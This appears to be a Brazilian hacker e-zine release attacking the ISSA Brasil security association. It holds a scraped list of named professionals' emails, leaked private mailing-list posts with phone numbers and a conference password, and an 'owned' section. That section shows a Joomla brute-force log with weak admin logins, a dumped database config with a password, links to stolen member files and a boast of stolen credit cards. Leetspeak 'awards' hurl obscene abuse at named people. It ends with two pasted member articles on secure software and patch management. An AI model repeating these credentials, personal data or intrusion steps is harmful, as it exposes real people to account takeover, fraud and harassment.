ICT Security Manager 282Connections * Souza, Aylton abu@click21.com.br Emerging business and Information Security Expert 146Connections * Souza, Gustavo gustavo.souza@disec.com.br Owner, Disec Security Services 85Connections * Sprickerhoff, CISA CISSP, Eldon eldons@esentire.com Founding Partner at eSENTIRE, Inc. 224Connections * Stein, Diter dstein@ti-intelligence.com.br Owner, TI Brasil Intelligence 30Connections # T * Tancredi Molina, Miguel Angelo molina@netbrasconsult.com.br Technical Director at Netbras Consultoria 21Connections * Teixeira, Alexandre alexandre.abreu@gmail.com Sr. Security Analyst at Nextel 47Connections * Thomas, Don don.thomas@certegy.com CIO 38Connections * Thomas, Ralph rthomas@idefense.com Malware Researcher at Verisign / iDefense 77Connections * Thomason, David dthomason@securityevangelist.com President of Thomason Technologies 164Connections * Tocaxelli, Renato tocaxeli@modulo.com.br Business Executive at Modulo Security Solutions and Information Technology and Services Consultant 42Connections * Tocaxelli, Renato tocaxelli@modulo.com.br Information Technology and Services Consultant and Contractor 118Connections * Toledo, Flavio flavio.toledo@gmail.com Information Security Professional 28Connections * Tomaszewski, Marcelo mtomaszewski@gmail.com Investments and Business Development 500+Connections # U * Uyehara dos Anjos, Simone simoneuanjos@gmail.com Channel Manager 99Connections # V * Valiatti, Homero valiatti@gmail.com Information Security & Fraud Control Consultant at CLM Software 75Connections * Vargas, Alexandre avargas@modulo.com.br Account Manager / Security & Risk Management Project Manager at Modulo Security Solutions 109Connections * Vasconcelos, Luthiano luthiano@gmail.com Chief Technology Officer at Tuangr.com 500+Connections * Velloso, Fabio linkedin@fabiovelloso.com.br System Architect at Telefônica Latin America 93Connections * Veras, Thompson tpveras@gmail.com Information Security Consultant at Banco Itaú 35Connections * Viana, Odair odairviana@yahoo.com.br Information Technology and Services Professional 12Connections * Vianna de Camargo Neves, Eduardo eduardo@camargoneves.com Business Development at Conviso Information Security Technical Services 155Connections * Viceconti, Carlos A. cviceconti@gpnet.com.br Owner, DigisSign Ltda 17Connections * Videira, Thiago tvideira@br.ibm.com Technical Sales Specialist at IBM Brazil 18Connections * Vieira, Daniel DVIEIRA@BKB.com.br Operational Risk Manager at BankBoston /Bank of America 41Connections # X * Xu, Joe OXU1@YAHOO.COM Assistant Director at Ernst & Young 18Connections # Y * Yokoyama, Sidnei sidnei@dicas.org.br Security Information Technology Manager 74Connections * Young, Kathy kathyzmail@gmail.com Experienced Staff Augmentation Professional 321Connections # Z * Zamboni, Joel joel.zamboni@gmail.com Project Manager at Proteus Security Systems 30Connections * Zanardo, Luiz lzanardo@gmail.com Information Security and Fraud Control Product Manager && Electronic Musician 387Connections * Zanero, Stefano zanero@elet.polimi.it Information Security Consultant and Researcher 500+Connections * Zanetti, Jefferson jeffez@gmail.com Gestão de Tecnologia da Informação 36Connections * Zaninotti, Thiago thiago@zaninotti.net Principal Architect of N-Stalker Web Security Company | Security+,CISSP-ISSAP,CISM 285Connections * Zeidan, Gustavo gustavo@mariath.com Lead Security Architect at Visa Europe 201Connections * Zillo Neto, Marcello Marcello.Zillo@vivo.com.br Security Analyst at Modulo Security and Computer & Network Security Consultant 31Connections # # * Álvares, Marcos mabj@tempest.com.br Developer at Tempest Security technologies 31 <============= LinkedIN =============> <============= Yahoo! groups =============> issabr-illuminati · ISSA BR - Illuminati Description (Edit, Add Photo) Grupo da chapa 2 eleita para a diretoria da ISSA Brasil-SP Senhores, Segue anexo a primeira proposta da Latin Event para discutirmos. Abraço, Dimitri ---------- Forwarded message ---------- From: Zuleica Machado Date: May 15, 2008 4:58 PM Subject: Fórum ISSA - Proposta To: Dimitri Abreu - ISSA Dimitri, Como conversamos, segue apresentação de proposta para Fórum a ser realizado pela ISSA - Capítulo Brasil. Aguardamos sua avaliação e nos colocamos à disposição para eventuais ajustes e/ou questionamentos. Agradecemos sua atenção. Cordialmente, Zuleica Mazzetti Machado Gerente de Eventos Latin Event Feiras e Congressos Tel.: 11 2905 1763 Cel.: 11 9988 2855 www.latinevent.com.br Attachment(not stored) Apresentação ISSA.pps Type: application/vnd.ms-powerpoint Força, tudo pronto para o ISSA Day Message List Reply | Forward | Delete Message #3147 of 3158 < Prev | Next > Pessoal, formulário de inscrições no site, informações do Secmaster atualizadas também. Por favor, Diretor de Comunicações: - DIVULGAR NAS LISTAS E OUTROS LUGARES - Junto, a informação de que temos mais uns dias para inscrição de candidatos! - MUITO IMPORTANTE - Willian/Fernando, vocês conseguem ver com a Via Forum para atualizarem o site do Secmaster também??? Pessoal, lembrem-se do esforço para conseguirmos mais candidatos! E a votação, podemos fazer na quarta (24)? Acho que é o único jeito. []s -- Augusto Paes de Barros, CISSP-ISSAP® http://www.paesdebarros.com.br/indexpb.html SECMASTER, ATENÇÃO Message List Reply | Forward | Delete Message #3137 of 3158 < Prev | Next > Pessoal, confirmei ontem com a Via Forum a apresentação dos finalistas no ISSA DAY DE ABRIL, com a premiação no ISSA DAY DE MAIO. Por favor, quem estava negociando o local do ISSA Day de Abril, passe-me a data e o local ASAP, para que eles possam fazer a divulgação nesta semana. Agora vamos precisar de MUITA atenção e esforço nas próximas duas semanas para incrementar o número de candidatos. Temos o problema de sermos comissão julgadora, ou seja, fica ruim corrermos atrás de candidatos pessoalmente. Peço que todos entrem em contato com colegas mais próximos para que estes procurem novos candidatos. Temos pouquíssimo tempo e não há mais chances de adiamento. Por favor, prioridade máxima para identificar candidatos e fazê-los se increverem. Lembrem-se, somos comissão julgadora, evitem o contato direto com os possíveis candidatos. Outra coisa que pode ajudar mais que tem que ser feita muito rápido. Se alguém tiver idéia de prêmios (não brindes, prêmios) a serem oferecidos, vamos tentar fechar algo esta semana. Cursos gratuitos, por exemplo, seriam perfeitos :-) Resumindo, para já preciso da data e local do ISSA Day. Para já-um-pouco-menos precisamos de candidatos. []s -- Augusto Paes de Barros, CISSP-ISSAP® http://www.paesdebarros.com.br/indexpb.html Fwd: Download palestras CNASI - Edição Comemorativa 15 anos Message List Reply | Forward | Delete Message #1267 of 3158 < Prev | Next > FYI ---------- Forwarded message ---------- From: Maria Aparecida Date: Sep 29, 2006 5:48 PM Subject: Download palestras CNASI - Edição Comemorativa 15 anos To: stdiasp@gmail.com Caro (a) Palestrante, Agradecemos mais uma vez, a sua valiosa contribuição e aproveitamos para informar, abaixo, seu "username" e "senha" para acesso às Palestras do CNASI – Congresso Nacional de Auditoria de Sistemas, Segurança da Informação e Governança – Edição Comemorativa 15 anos – São Paulo, que nos foram disponibilizadas. Para sua maior comodidade as palestras poderão ser acessadas no endereço http://www.cnasi.com.br/grade. A opção pelo download está representada pela figura de um "disquete". Clique sobre esta figura e informe os seguintes dados: Usuário: cnasisp2006 Senha: fIdFw&uk Caso surja alguma dificuldade ou dúvidas, queira por gentileza contatar-nos. Nossos sinceros agradecimentos, Maria Aparecida Secretaria Executiva CNASI 2006 Tel.: (11) 5531-3899 cnasi@cnasi.com.br -- Sérgio Dias MVP Security CISSP, MCSO, Security+ MCSA/MCSE:Security, MCT http://spaces.msn.com/sdias SLICE - Sara Lee Information Center of Excellence Message List Reply | Forward | Delete Message #272 of 3158 < Prev | Next > Re: [issabr-illuminati] SLICE - Sara Lee Information Center of Excellence Augusto, A aproveitando a "onda de toques", como vai a redação daquele e-mail para a lista ISSABR ? (BTW, se quiser eu faço isso). Depois me passa a senha, etc do e-mail da vice-presidencia. TKS! OBS: Nao uso Skype, meu gtalk é esse e-mail do google, eu gosto de ICQ (1649994). O MSN é mrbilly01@hotmail.com. Celular é o (11) 8464-3823. Tambor são dois toques graves e um curto, Sinal de fumaça são 3 abafadas e 1 baforada. Telepatia não preciso dizer meu contato, quem sabe usar descobre sozinho. On 7/27/06, Luiz Firmino wrote: Wagner, já que é para brincar de ser chato, por favor, você poderia me passar o contato na Impacta ou agendar uma reunião com eles? Augusto, já que você gostou do toque (com carinho;-) do Wagner, rs, alguma novidade sobre o contato com: Abul sobre a parceria do próximo ISSA Day? Ricardo sobre administração do site e demais contas? Fávero sobre os acordos com os parceiros da antiga gestão? []s Luiz Firmino On 7/26/06, Augusto Paes de Barros < apbarros@gmail.com> wrote: hehe, gostei do toque "Wagner Slade" :-) Augusto skype: apaesdebarros msn: apbarros@hotmail.com gtalk: apbarros@gmail.com 8152-8839 / 9153-5061 / 3741-1877 []s <============= Yahoo! groups =============> ----------------------------------------------------------------------------------------- 4; premiação do troféu camargo neves - prêmio seclamer, o oscar da segurança do brasil ----------------------------------------------------------------------------------------- f1gur4 1.0: uM s0ld4d0 d0 i sh0t the white hat: _||||||||||||||||||||||||_ / \ / \_/ \ | \____ _____/ | | / o /\ /\ o \ | | \___/ \___/ | | /\ | \ ______________________ / \_ .____| | | |____. _/ \ |___| |___| / \______________________/ _____| |_____ / \ | | | /____________ \ | |\/\/\| I EAT CISSPS |\/\/\| | ~~~~~~~~~~~~ | | | < > ( b0rn 2 0wn! ) \__________________/ ********************************************************* * Troféu Camargo Neves - Prêmio SecLamer by ISSA Brasil * ********************************************************* 0 Troféu Camargo Neves, um4 iNiC1aTiVa c0njunt4 d4 cÉluL4 Br4S1l do pr0j3kt m4yh3m e h4ck3rs d4 eur0p4, amÉric4 e áSia, É a pr1nc1p4l pr3mIAçã0 d0 gêNEr0 n4 4méR1Ca l4t1n4. O SecLamer - Troféu Camargo Neves, v1s4 0 desEnv0lv1m3nt0 D0 s3ntim3nt0 de Ódi0 e rEpÚd10 qU3 nós h4ckers t3m0s a0s "3xp3rts" qUE aCh4m quE seGur4nça d4 inf0rm4çã0 é t3r um4 b3l4 c3rtific4çã0 em0lduR4da n4 p4r3d3, m3m0r1z4r as n0rm4s d0 NIST e r3c0m3nd4çõEs da ISO e al1m3nt4r 0 m3d0 e a HiStEria d0s iGnoR4nTEs p4r4 luCr4r c4da vEz m4is. Aqu1 v4i um r3cAd1nh0 pR4 v0Cês: EnfiEm 0 s3u CISSP no CÚ!!!!!! C0missã0 julg4d0r4 2008: % Gustavo Bittencourt (Módulo / cisspbr) % Ronaldo Castro Vasconcellos (CAIS-RNP) % Eduardo Camargo Neves (Philip Morris) % Renato Opice Blum (Opice Blum Adevogados Associados) % Nelson Murilo Rufino (Pangéia Informática) %%%%% VENCEDORES DE 2008 %%%%% --- Menção Honrosa por Imbecilidade --- and the oscar goes to... Eduardo Camargo Neves, CISSP. mAs poRquÊ? Eduzinho diSSE na cisspbr quE nÓS do pr0j3kt m4yh3m br4z1l d3v3rÍam0s s3r pr3s0s h4h4h4h4! *** pr0j3kt m4yh3m br4z1l wh1tE h4t d0min4ti0n 2008 / pr1s0n 2009!!! *** N3m É pReC1s0 c0m3nt4R sobRe o nÍvel DaS m3nSaG3ns do S3nh0r Camargo Neves. TamBÉm v4l3 f4l4r QuE Edu Camargo Neves, o mAioR sEcuRITy OffICer d0 p4ís, p4ss0u nA pr0v4 dE CISSP c0m n0Tas baiXas n4s c0mp3tênCias m4is tÉcniCas d0 ex4me. QUE SE FODAM EDUARDO CAMARGO NEVES E SUA CORJA DE FUMANTES DA PHILIP MORRIS!!!11 --- Pior Artigo do Ano --- É f4t0 c0nh3ciD0 quE Os whiTe h4ts d0 BrasIL nã0 c0stum4m a EscRev3r p4pers. Talv3z poRquE s3j4m oCup4d0s d3mais, 3xperTs d3m4is oU simPlESmenT3 l4m3rs D3m4is p4Ra enT3nd3r tÓpic0s m4is c0mpl3x0s quE b0tnets 0u sp4m. A0s pouC0s quE s3 4v3ntuRaRam fic4 AQui 0 n0Sso p4raBénS m4s v0Cês 4inDa t3m MUITO o QUE apRenD3r p4rA esCr3v3r um ArtiGo téCnic0 d3scenTe. Med4lh4 de 0ur0: André Fucs (VoIP Security: Net telephony and security) Med4lh4 de pr4t4: Denny Roger Santos (Técnicas de ataques em redes Wireless) Med4lh4 de br0nz3: Augusto Paes de Barros (New botnets trends and threats) --- Pior Palestra do Ano --- C0m0 nóS do i sh0t the white hat / pr0j3kt m4yh3m br4z1l esT4m0s s3mpr3 pReSeNTeS c0m0 0lh3ir0S em vÁRi0s ev3nt0s n0 Br4s1l r3s0lv3m0s 3l3gEr a pAlEStrA m4is iDioTa d0 an0. A RNP com 0s s3us palEstr4nt3s c0nseGuiu unIfic4r os TíTulos, g4nh4ndo 4s m3dalh4s d3 0ur0, pr4tA e BR0nz3. É b0m s4bEr que a InFraEsTRtuRa d0s b4ckb0nes n4ci0n4is eStã0 naS mã0s d3ss3s p4n4cas (v1d3 A 0wn4dA d0 c0m3çO d4 z1n3 hOHoho0h0h0). Med4lh4 de 0ur0: Jacomo Picollini (Combate do CAIS/RNP à atividade hacker no backbone acadêmico) Med4lh4 de pr4t4: Guilherme Vênere (Atividades Hackers no Brasil) Med4lh4 de br0nz3: Klaus Steding-Jessen aka Lance Spitzner II (SpamPots Project Using Honeypots to Measure the Abuse of End-User Machines to Send Spam) P4R4BÉNS, RNP e CERT.BR!!1!! --- Maior F4m3 S33k3r do Ano --- ESsE f0i um 4no s3m muIt4s suRpr3saS n3m n0vid4dEs nO c4mp0 de f4m3 s33kErs. O úNic0 dEsTaQue de 2007 fOi a ApAriçã0 de Marcos Sêmola, ex-Atos Origin e atual Shell, c0m0 n0ss4 m3d4lha De br0nz3 p3l4 suA pÉss1m4 c0luna "Firewall", do IDG Now!. A c0missã0 jUlg4d0ra s3 p3rgunT4 0 Que h0UvE c0m Marcos Flávio Assunção p4rA elE nã0 t3r aP4r3c1d0 em uM j0rn4l3c0 sEQueR 3m 2007. PARABÉNS AOS FAME SEEKERS!!! Med4lh4 de 0ur0: Denny Roger Santos Med4lh4 de pr4t4: Marco Aurélio Thompson Med4lh4 de br0nz3: Marcos Sêmola --- Thread Mais Idiota da cisspBR --- Nã0 HÁ 0 Qu3 c0m3nt4r s0br3 a Thr3aD m4is imB3c1l d4 pi0R l1sTa d0 Brasil d3p0is d0 c4bid3 d3 3mpReg0s quE é 4 SecurityGuys. S1mpl3sm3nt3 0s w4nn4b3s Da CISSPBR qUE ap4r3nt3mEntE SubiT4m3nt3 s3 t0rn4Ram esPECi4list4s eM seGuRanÇa d3 Av14çã0 aBrir4m uMa diScussã0 s0br3 a anál1s3 d3 r1sc0 d0 teRRívEl aCid3nt3 c0m 0 aviã0 da TAM. A c0missã0 julg4d0ra 4chA d3sR3speiT0s4 4 f0Rma d3 aUT0 pr0m0çã0 us4dA p0r eSS3s crÁpul4s c0rvArD3s E s3m eScRúpul0s 3 s3m 0 m3n0r s3ns0 d3 c0mpAixã0 c0m 4s v1d4s p3rdid1d4s n0 Acid3nTe. \|/ Medalha Field para Análise de Risco Acidente do vôo 3054 TAM \|/ thread do ano by Sergio Dias: "Não acredito que a análise de risco esteja nas ranhuras ou não, e sim no impacto. Qualquer desastre em congonhas leva consigo vidas dentro e fora do avião. Também é lindo, para nós que lidamos com desastres, ver como estamos com criação de comitês de crises e planos de contingências. Como profissional de SI, e certificado CISSP, eu gostaria de deixar meus sentimentos por todos aqueles que, de certa forma, foram afetados." C0nd0lênCi4s "Como profissional de SI, e certificado CISSP"?! Iss0 s3 f4z c0m0 s3r hUm4n0, s3nh0r Sérgio, e nã0 p0RquÊ v0cê t1r0u Um4 c3rtifIcaÇã0 MERDA d3ss4s. VAI CHUPAR UM CARALHO, SEU FILHO DA PUTA!! VAI CHUPAR UM CARALHO, SEU FILHO DA PUTA!! --- Informante Do Ano --- Av1s0 à C0mun1d4d3 h4ck3r: tEnh4 muIT0 cu1d4d0 C0m eSSAs p3ss04s. ElES vã0 à c0nfeRênciaS e Se diSFarÇ4m c0m0 h4ck3rs p4rA c0nS3guiR inF0rm4çõEs s0br3 v0cêS E enTr3g4-las à Polícia Federal n0 rel4tÓRi0 4nuAl d3 cib3rcr1me e apr3s3nt4r 0s r3sult4d0s na ICCyber. NARCS NARCS NARCS NARCS NARCS NARCS NARCS NARCS NARCS NARCS NARCS NARCS NARCS NARCS NARCS NARCS NARCS NARCS NARCS NARCS NARCS NARCS NARCS NARCS NARCS NARCS NARCS NARCS NARCS NARCS NARCS NARCS Med4lh4 de 0ur0: Guilherme Vênere - CAIS/RNP Med4lh4 de pr4t4: Nelson Murilo Rufino Med4lh4 de br0nz3: Jacomo Picollini --- Evento Mais L4M3R do Ano --- Arr0z d3 fESta QuE s0m0s, 0 pioR eVent0 d0 an0 f0i Fácil d3 s3r eLeit0. EnTr3 0s QuEsiT0s p4rA a EleiÇã0 est4Vam a t0t4l iRR3leVânCia d0s t3mAs d0 EvenT0 c0m seGuRanÇa e a QuanTid4d3 d3 enGraVaT4d0s pr3s3nt3s. Aí s4iu n4 fr3nt3 a f4m1geR4da SecurityWeek, quE liDer0u t0da 4 V0taçã0. Par4bÉns ViaForum! ConTinUem aSSim em 2008. Med4lh4 de 0ur0: Security Week Med4lh4 de pr4t4: CSO Meeting by Módulo Med4lh4 de br0nz3: CNASI ------------------------------------------------------------------------------------------------------------ 5; ISSA Brasil 0WN3D ------------------------------------------------------------------------------------------------------------ jÁ tEm um b0m t3mp0 quE esSes c4Ras Do caPíTul0 Br4s1l dA ISSA eStã0 enCh3nd0 uM s4c0. S3 um cissp id10t4 iNc0m0da mUiTa GenTe c0m su4s b4b0s3irAs e Ar de SupERi0r1d4dE em List4s, meiA dúZia d3lEs iNC0moDam inC0m0dam inC0MoDam muito Mais! Aí a G3nTe fic4m0s puTos e ReSolv3m0s iR à GueRR4 c0ntr4 eSSeS vi4d0s aRR0gAnteS da ISSA E nã0 é SurpR3Sa QuE mu1t0s d3l3s sã0 FiGuR1nh4s c0nh3CidaS da cisspBR. PoiSÉ, 0wn4m0s 0s CaraS e CoM umA f4CiLiD4De iMenS4, 0 QuE dem0nStr4 c0Mo elES sã0 b0ns c0nSulT0r3s e AgenTes d3 seGur4nçA. DE QuEbR4 pr4 v0CêS aí v4i a V3rSã0 s0m3nt3 pArA ass0ci4d0s d4 rEVisT1nh4 m3rDa d3l3s. !!! WHITE HAT HOLOCAUST MOTHERFUCKAH !!! Pr4 C0mpr0v4R Que a ISSA é uM4 m3RdA 0lh3m 0 bl0g brainsniffer http://brainsniffer.blogspot.com/2007/11/issa-membership-renewal-notice.html ISSA Membership Renewal Notice Obrigado por me lembrar 90 dias antes, Sr. ISSA. Não, obrigado. Foram os $127,50 dólares (considerando tarifa de uso do cartão no exterior) mais mal gastos dos últimos tempos, cerca de R$280,00 na minha fatura de Fevereiro para ser mais preciso. ISSA dificilmente é "a voz do profissional de segurança" brasileiro, talvez dos profissionais que moram em São Paulo. Mas esta é minha opinião pessoal. Não preciso pagar por networking, não preciso de CPEs, não tive desconto em coisa alguma em 2007, não considero o ISSA Journal interessante, pude ir a somente um ISSA Day. 0lh3m L0g0 4bAiX0 a m3Rd4 d3 quAl1d4De d0s m4TeRi4is quE elEs Disp0n1b1l1z4m p0r Ess3 pReço AbuS1v0!! $ ./joomla-brute.py -h www.issabrasil.org/administrator -L logins -P passwords Joomla brute force by Nelson Murilo Rufino (nelson@abin.gov.br) - private use for ABIN only login: Anchises.Paula password: 12345 login: Dimitri.Abreu password: 12345 puT4 QuE pARiu, nã0 tô aCreDIT4nd0!!1! v4m0 h4ck3Ar hAhAHa <======= dumpAndo o mySQL ========> $mosConfig_host = 'localhost'; //www.issabrasil.org $mosConfig_user = 'joomla_usr'; $mosConfig_password = 'xgunner67'; $mosConfig_secret = 'dXcvuNFvOTcOEYxG'; o_o-o_O-o_o-O Antebellum 2.0 sup0st4m3nt3 priv8 s0m3nt3 pAr4 AssoCiaD0s (nã0 m4is hehehe) o_o-o_O-o_o-O [*] http://rapidshare.com/files/117547190/Antebellum_Ed_002.pdf.html [*] ANTEBELLUM pra a puta que pariu caralho q merda de revista!!!!!!!!! obs: mu1t0 0br1g4d0 t0d0s 0s aSs0c14dos. Nós r0ub4m0s t0d0s 0s s3us caRtõES d3 CrÉd1t0 e 1ncluS1v3 uS4m0s paR4 c0mpr4r 0 n0ssO ish0tthewhitehat.com :PppPPpppp At4 d4s R3uniõEs fev3Re1ro 2007 = http://rapidshare.com/files/117348523/ata_da_2a_reuniao_07.doc.html j4n3ir0 2007 = http://rapidshare.com/files/117348729/Ata_da_1a_Reuniao_07a.doc.html o_o-o_O-o_o-O Art1g0s s0m3ntE p4Ra aSsoCi4d0s (não m4is) o_o-o_O-o_o-O Desenvolvimento de software seguro para as organizações Desenvolvimento de software seguro para as organizações Por Ramiro Rodrigues O Brasil está no caminho se tornar um pólo de exportação de serviços de T.I. com grande potencial de crescimento sustentado a custos competitivos. Essa é uma das previsões do instituto de pesquisas Gartner Group, que destaca um crescimento especifico na prestação de serviços de desenvolvimento de aplicativos (fábrica de software) principalmente para as empresas européias e americanas. Concomitantemente, a adoção de tecnologias inovadoras, como SOA – Service Oriented Architeture, que transforma as aplicações em serviços e componentes reutilizáveis, está na ordem do dia dos CIOs brasileiros pressionados por redução de custos, eficiência e aumento da eficácia na prestação dos serviços e na racionalização dos recursos de T.I., levando-os a considerar novos modelos de organização de seus sistemas de informação bem como a terceirização (outsourcing) de algumas funções de T.I. Esses modelos tecnológicos e de gestão levarão as organizações a uma necessidade maior de responsabilização pela segurança dos softwares desenvolvidos. Essas organizações não mais esperarão pela descoberta e exploração das vulnerabilidades dos softwares pelos hackers e crackers, e sim tomarão uma postura pró-ativa na forma como elas concebem, desenvolvem, operam ou terceirizam os softwares nos quais seus processos de negócios se apóiam. Para reforçar essa postura, surgiram requisitos regulatórios para alguns segmentos na tentativa de tornar as organizações mais responsáveis pelos seus softwares não seguros e pelas conseqüências e danos aos dados de seus clientes (ex. as ramificações dos requerimentos da sarbanes-oxley incluem os softwares e aplicações que tratam as informações das demonstrações financeiras). Nesse sentido, as iniciativas como classificação e proteção das informações, análise das vulnerabilidades dos softwares aplicativos, aplicação das políticas e gestão das identidades e dos acessos serão críticas para os próximos anos. Em se tratando de vulnerabilidades de softwares, alguns frameworks (Ex. Cobit, COSO e ISO 17799) de conformidade provêem alguma orientação sobre como desenhar e implementar os requisitos de compliance, bem como para um processo sistemático de gerenciamento de vulnerabilidades e segurança de software. Até recentemente, quando se falava em segurança de software não se obtinha muita atenção por se tratar de uma atividade pouco prática, entretanto, à luz do cenário regulatório e do nível de exposição aos riscos, as organizações devem incorporar um processo sistemático de segurança de software. Essas organizações precisarão de um processo prático, eficiente e mensurável para avaliar e validar a segurança de seus sistemas (softwares) críticos, tanto os novos quanto os do legado. Os gestores de segurança das organizações brasileiras (security officers) devem se preocupar em planejar e priorizar medidas que envolvam o departamento interno de desenvolvimento de sistemas ou seu fornecedor (fabrica de software) para garantir que os níveis de segurança sejam determinados e que as medidas que assegurem a segurança dos softwares sejam especificadas e seguidas. Essas medidas, como por exemplo a integração de controles de segurança, devem ser aplicadas a todo SDLC (ciclo de vida de desenvolvimento de software) e devem considerar a identificação, a mensuração e a de auditoria de vulnerabilidades nos códigos fontes. Algumas das principais vantagens para as organizações ao adotar um modelo de gestão de segurança de software: * Melhoria da segurança: identifica e elimina as vulnerabilidades (no código fonte) antes que elas se tornem uma ameaça no ambiente de produção e de missão critica. * Redução de custos: a identificação e a eliminação das vulnerabilidades do software antes dele ir para o ambiente de produção, trazem uma redução significativa nos custos de desenvolvimento, correções e respostas a incidentes. * Demonstra a conformidade: Garante que o seu desenvolvedor (outsourced ou não) atende aos padrões de codificação segura. Valida os critérios de aceitação do software antes do seu desenvolvimento. Mensura e documenta o seu processo de gestão de segurança de software para atender os requerimentos de auditorias internas e regulatórias. É importante observar que não existe um nível de segurança único determinado para todas as aplicações e para a toda a organização. Tais níveis dependerão das necessidades específicas de segurança da aplicação e suas funções dentro do ambiente de negócios. Os níveis de segurança apropriados deverão ser determinados a partir das necessidades de negócios, análises dos riscos e análise de custo e do benefício. Com o aumento das fraudes, do custo da conformidade e dos custos de correções de vulnerabilidades, as organizações, através de seus security officers, devem adotar um modelo e desenvolver um processo sistemático para determinar os níveis apropriados de segurança e aplicar os controles durante todo ciclo de desenvolvimento dos aplicativos críticos que suportam os negócios da organização. Ramiro Rodrigues é executivo de projetos de Consultoria em T.I. e Segurança da Informação da CPM, tendo atuado em empresas como, PricewaterhouseCoopers e IBM.. Pós-graduado com MBA em Gestão de Segurança da Informação. Certificado PMP® - Project Management Professional pelo PMI , CISM® – Certified Information Security Manager pelo ISACA e CISSP® - Certified Information System Security Professional pelo ISC2.Professor da pós-graduação dos cursos de MBA – Gestão de Tecnologia da Informação e MBA – Gestão de Segurança da Informação da FIAP – Faculdade de Informática e Administração Paulista. Sugestões e comentários, envie um e-mail para: ramiro.rodrigues@pobox.comThis e-mail address is being protected from spam bots, you need JavaScript enabled to view it -- Quando o gerenciamento de patches se torna mais importante que remendar Quando o gerenciamento de patches se torna mais importante que remendar Por Rodrigo Macedo O que uma montadora de veículos e uma companhia farmacêutica tem em comum com a indústria de software? Produtos passíveis de erros. Em maio do último ano a Volkswagen realizou o terceiro maior recall da história no País. Foram 123 mil veículos convocados para revisão do sistema que controla o funcionamento dos componentes eletrônicos dos carros. Um pouco antes, em setembro de 2004, a Merck & Co, gigante farmacêutica, anunciou a retirada do mercado, em todo o mundo, do VIOXX, um medicamento indicado para o tratamento da artrite e dor aguda que, após estudo clínico realizado pela própria fabricante, constatou elevado risco de ataque cardíaco e acidente vascular cerebral nos seus usuários. No primeiro trimestre de 2006, a SANS Institute, relata que foram reportadas mais de 600 vulnerabilidades em softwares diversos. Se a semelhança entre as companhias ocorre no desenvolvimento de produtos com falha, a correção se mostra tão distante quanto os seus segmentos de mercado. Através de uma extensa, e bem suprida, rede de concessionárias, a montadora corrige o problema dos veículos sem onerar os seus clientes e de maneira rápida. No segundo exemplo, a farmacêutica com o auxílio de um canal de distribuição efetivo, impede a venda do produto inseguro ao mesmo tempo em que orienta seus consumidores a adquirirem um medicamento substituto sob supervisão médica. Já nos sistemas de informação a responsabilidade da correção recai quase que totalmente sobre o usuário que perceberá em algum momento que a correção em si pode desencadear problemas maiores que a própria falha a ser reparada. Neste contexto, surge a necessidade de um modelo de suporte que o mercado começa enxergar. Foi assim com o gerenciamento de recuperação de desastres, vai ser assim com o gerenciamento de correções. A resposta da Segurança da Informação frente à complexidade e ao enorme volume de correções vem através do Gerenciamento de Patch, uma proposta sólida, escalável e segura. A abordagem que consiste em quatro etapas tem como resultado assegurar uma operação eficaz para empresas de todos os portes, tornando a prática padronizada e consistente. Em resumo, o processo inicia com a Avaliação que tem por finalidade conhecer o ambiente a ser corrigido. Esta fase trata da auditoria de software e sugere que sem um ambiente padronizado e devidamente documentado o inventário torna-se quase impossível comprometendo todas as fases seguintes do programa. Aqui vemos que os recentes esforços feitos em torno da adoção de melhores práticas e estratégias de governança da TI, tal como ITIL e CoBIT, servem de base (senão mandatórios) para o gerenciamento de patch mais eficiente. O ITIL não aborda um processo de gerenciamento de patch, mais que isso, ele cobre as atividades sob as categorias de gerenciamento de mudanças (Change Management), gerenciamento de liberação (Release Management) e gerenciamento da configuração (Configuration Management). Os benefícios desta abordagem vão além de processos mais repetitíveis, eficientes e executáveis. Eles alinham o risco de correção com os requerimentos do negócio conduzindo a companhia de um modelo de patch individual (conhecimento como sneakernet) para uma prática documentada, formal e abrangente. A próxima etapa, Identificação, consiste não apenas em descobrir as atualizações de maneira confiável e rápida, mas também definir a importância das atualizações para fixar sua estratégia de implementação que poderá ser emergencial ou programada. Essas duas categorias determinam o valor de investimento utilizado no programa. Sim, as empresas começam a adotar investimentos diretos no gerenciamento de correções confirmando a idéia do mercado de que, mais que melhores práticas, o gerenciamento de correções se encaminha para um produto. Nesta etapa evidencia-se uma falha muito comum das organizações bem intencionadas, porém mal assessoradas, que se iniciam no processo de correções. Elas se sustentam em uma ferramenta automatizada de patches sem determinar se a correção devem ou não realmente ser aplicada ao ambiente. Os prejuízos deste método aparecem à curto prazo quando pode-se observar um aumento significativo de indisponibilidade de serviços. Já a médio e longo prazos a companhia irá perceber que as atualizações ainda parecem fora de controle quando algumas máquinas apresentam as correções em dia e outras estão meses atrasadas. O problema maior é que a companhia não consegue responder se as máquinas não corrigidas não estão no estado desejado por alguma razão técnica ou de negócio ou se alguém simplesmente esqueceu de aplicar as correções exigidas. A melhor escolha para esta pergunta vem do gerenciamento de risco. Aqui a equação “risco = ameaça x vulnerabilidade x custo” toma peso na discussão de aplicar ou não uma correção. Classificando níveis de risco logo que a vulnerabilidade é descoberta permite as companhias priorizar o grande volume de trabalho ao mesmo tempo em que mantém o foco nas atualizações de importância para o negócio da empresa. O terceiro ponto tratado descreve a decisão de implantar e testar a atualização em um ambiente semelhante ao de produção para certificar a qualidade da correção e evitar impactos indesejados nos sistemas e aplicativos críticos aos negócios. Implantar é a quarta e última fase do modelo, que está relacionada com o desenvolvimento bem-sucedido das atualizações de software aprovadas no ambiente de produção, visando atender a todos os requisitos relativos aos SLAs (Nível de Acordo de Serviço). Podemos observar ao longo dos quatro pontos que o gerenciamento de patch é uma tarefa multidisciplinar que envolve não apenas qualidades técnicas, mas principalmente visão de negócio. A despeito de cada etapa indicar objetivos distintos uma das outras, elas se completam facilitando a definição da estratégia técnica que será utilizada no projeto, tais como a escolha da ferramenta de automatização de correção. Hoje existem mais de 30 produtos voltados diretamente para a tarefa de automatização de correções. Produtos estes apoiados por uma comunidade em rápido crescimento e ávida por um processo definitivo e seguro. Espalhadas por fóruns e listas de segurança da informação, melhores práticas e administração de sistemas, os interessados no gerenciamento de patches, como eles identificam, começam a manifestar-se a favor não apenas de segurança, mas também de disponibilidade de serviço, qualidade na aplicação de correções e retorno de investimento no processo adotado. Seja qual for a discussão, todos sabem que o erro é inevitável e que a responsabilidade de correção é do usuário. Fazer isto de maneira rápida, confiável, transparente e dentro do investimento disponível é a grande aposta no processo formal de gerenciamento de correção. Rodrigo Macedo é consultor especializado em gerenciamento de patch e vulnerabilidade para empresas como IBM, Johnson & Johnson Company e Dow Chemical. Sugestões e comentários, envie um e-mail para 